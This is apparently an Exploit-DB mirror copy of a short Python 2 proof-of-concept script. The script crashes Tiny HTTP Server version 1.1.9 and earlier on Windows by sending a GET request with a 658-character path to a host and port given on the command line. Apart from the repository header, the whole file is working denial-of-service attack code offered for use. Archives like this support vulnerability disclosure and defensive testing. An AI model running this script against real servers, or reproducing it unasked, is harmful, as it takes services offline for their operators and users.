exploit-db-mirror/exploits/windows/dos/18524.py
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

31 lines
No EOL
759 B
Python
Executable file

#!/usr/bin/python
# Tiny HTTP Server <=v1.1.9 Remote Crash PoC
# written by localh0t
# Date: 24/02/11
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar
# Targets: Windows (All)
import httplib,sys
if (len(sys.argv) < 3):
print "\nTiny HTTP Server <=v1.1.9 Remote Crash PoC"
print "\n Usage: %s <host> <port> \n" %(sys.argv[0])
sys.exit()
payload = "X" * 658
try:
print "\n[!] Connecting to %s ..." %(sys.argv[1])
httpServ = httplib.HTTPConnection(sys.argv[1] , int(sys.argv[2]))
httpServ.connect()
print "[!] Sending payload..."
httpServ.request('GET', "/" + str(payload))
print "[!] Exploit succeed. Check %s if crashed.\n" %(sys.argv[1])
except:
print "[-] Connection error, exiting..."
httpServ.close()
sys.exit()